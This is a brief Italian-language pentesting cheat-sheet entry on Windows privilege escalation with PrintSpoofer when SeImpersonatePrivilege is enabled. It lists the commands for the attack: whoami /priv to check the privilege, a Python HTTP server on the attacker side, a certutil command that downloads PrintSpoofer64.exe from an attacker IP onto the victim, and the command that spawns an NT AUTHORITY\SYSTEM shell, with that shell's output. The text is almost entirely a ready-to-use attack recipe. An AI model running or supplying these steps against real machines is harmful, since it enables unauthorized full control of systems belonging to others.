tags: PrintSpoofer privilage_escalation SeImpersonatePrivilege


Se con il comando:

whoami /priv

Appare questo privilegio su enabled:

PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                               State
============================= ========================================= ========
...
SeImpersonatePrivilege        Impersonate a client after authentication Enabled  

Allora possiamo scaricarci il file PrintSpoofer.exe che ci permette di ottente privilegi NT-Authority con un semplice comando, il file .exe lo trovi a questo indirizzo

Una volta caricato sulla macchina vittima per esempio con i seguenti comandi:

#Sulla macchina attaccante
python3 -m http.server
 
#Sulla macchina vittima 
certutil.exe -urlcache -split -f http://10.11.141.131:8000/PrintSpoofer64.exe C:\Windows\Temp\PrintSpoofer64.exe 

Una volta caricata ci basta eseguire il seguente comando per ottenere una shell NT-Authority:

C:\Windows\Temp> PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32> whoami
nt authority\system